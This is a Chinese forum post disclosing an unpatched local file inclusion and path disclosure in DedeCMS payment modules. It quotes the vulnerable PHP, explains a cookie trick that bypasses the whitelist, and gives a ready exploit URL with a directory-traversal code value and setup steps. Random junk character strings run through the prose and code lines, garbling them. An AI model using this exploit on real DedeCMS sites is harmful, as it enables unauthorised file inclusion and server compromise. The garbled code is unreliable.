dedecms本地文件包含及物理路径泄露0day

admin

晚餐吃撑了，瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多，赶紧下了套，用editplus搜索了几个关键字，果然发现些问题。(话说平时写代码也喜欢用editplus，小巧方便多年习惯)

; D# W( |; v9 y: O出现漏洞的两个文件为：
% Y; A. W8 s- o+ D  Y$ X% ~5 F" lInclude/payment/alipay.php
Include/payment/yeepay.php
0 k6 v) I- D2 H漏洞均出现在respond方法里，估计这两个文件是临时工写的。

Include/payment/alipay.php

$ Q: A% N/ S! @/ T2 e......
8 N6 r( d4 c4 k3 O, [, t" y; Q/ \   function respond()
5 o+ i7 W* E9 |    {
        if (!empty($_POST))
* X$ z/ y- [! F* I        {
: x8 l6 L: Z& T6 P+ n+ v( O) k) u" a            foreach($_POST as $key => $data)
            {
                $_GET[$key] = $data;
4 y$ s, K4 K( Q# }* g! V/ u9 J            }
4 v! F. c$ `; F( |, }& P: }        }
6 a" g# k' R$ s( L* P& i0 m        /* 引入配置文件 */
3 q& |2 \, r; E        require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';
, @* w5 A$ D9 X% {......

% p+ ?  ~7 O2 b9 W% N
! P7 }6 Q& @4 H# o* ^大概在133行左右，$_GET[‘code’]没有经过任何判断和过滤。
# @' d" Q" g1 Z1 i! x7 E6 E4 g
  ]+ X# u2 L, f6 d$ H( E, J" NInclude/payment/yeepay.php
3 n2 J5 i  i( J7 i3 H4 T7 v& }

7 b0 c2 M0 w& u! P
. }) ^0 p1 v: v) D& G......
9 A4 ~9 q# |; Y4 J    function respond()
7 n( H8 }( y  ~* Z  M: x% s# L    {

6 S8 p* d% l5 D' @6 b0 ], z! i* l) c        /* 引入配置文件 */
        require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';
% t% c. |1 n8 m2 ?6 e) R
        $p1_MerId = trim($payment['yp_account']);
! l% |+ {, x5 q! r$ \        $merchantKey = trim($payment['yp_key']);
......
! j, E" A) R2 @9 z5 o5 B

4 F  ^! H! V2 O
- c3 \9 q% W: f( x/ M% w4 S* K
大概在145行左右，$_REQUEST['code']没有经过任何判断和过滤。
$ E0 j( }% A6 @3 ~0 K
, p. E, |, ^8 @# ]这两个方法在plus/carbuyaction.php文件调用。
. \, ~: @! B- C
plus/carbuyaction.php
! o# O. m0 [4 P1 R) _6 m
2 b$ p8 V! y2 ^3 K$ U8 L......
& \5 R. i4 b( S} else if ($dopost == 'return') {
    $write_list = array('alipay', 'bank', 'cod', 'yeepay');
    if (in_array($code, $write_list))
    {
* T- [5 ~( E! `; b4 \- W        require_once DEDEINC.'/payment/'.$code.'.php';
/ d  I' N0 p" [7 u' s0 ?, ]        $pay = new $code;
0 y# O- F* \* ?; }        $msg=$pay->respond();
        ShowMsg($msg, "javascript:;", 0, 3000);
        exit();  
    } else {
0 ]' J8 L0 S* D; a4 c/ b+ X+ _4 K& T8 T        exit('Error:File Type Can\'t Recognized!');
7 s8 t# g# f% |    }
}
......

- F8 |% }8 f# L* Z2 ]

4 d6 j  s& j: N8 i: Q3 C
8 _, N! x2 r- ~; o% M
* x! u8 v- q- W9 a
, a: ~8 w: C1 M$ R- ~' L大概在334行，当$dopost等于return的时候就开始进入过程了。熟悉dedecms朋友都知道在include/common.inc.php使用了一种类似register_globals的机制。
3 k: |" {% \" K/ w5 n* R5 t* G所以$_GET['code']或$_REQUEST['code']会变成$code，而$code是经过判断的，值必须在$write_list数组以内这样才能继续后面的流程调用respond方法触发漏洞。这样的话貌似就无法控制$_GET['code']为任意值了。

6 ~' G7 @1 k' D1 E# v: I3 b回到include/common.inc.php来看看他的机制。

  F  U" t* b/ u5 G9 T

; S9 V, `2 ]; s4 K" g9 J......
* z; p9 T2 J9 c4 n5 tforeach(Array('_GET','_POST','_COOKIE') as $_request)
& x. L# Z% c+ |% ^1 F7 o) U{
/ K3 B" \; d9 k2 E- e* b& c        foreach($$_request as $_k => $_v)
        {
: j1 _) s* d  j( r& B; t6 t" p: F# S                if($_k == 'nvarname') ${$_k} = $_v;
                else ${$_k} = _RunMagicQuotes($_v);
        }
4 P8 A' F9 m$ g}
......
+ C0 B6 b$ L! w, F& ~大概在79行，可以看到他是从$_GET,$_POST,$_COOKIE这三个全局变量里取值的。嘿嘿，细心点就发现了吧。从他这个优先机制来讲他是先从get再从post再从cookie也就是说最终$code会是以$_COOKIE[‘code’]的值为准，而我们要控制的是$_GET[‘code’]或$_REQUEST['code']只须要$code的值在$write_list数组以内就行了。Exp:http://www.php0day.com/plus/carb ... amp;code=../../tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断，使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie。暴路径:
由于bank和cod这两个文件并没有respond方法，所以如果code等于bank或者cod时将会暴错泄露路径。注：请勿非法测试，产生后果与本人无关。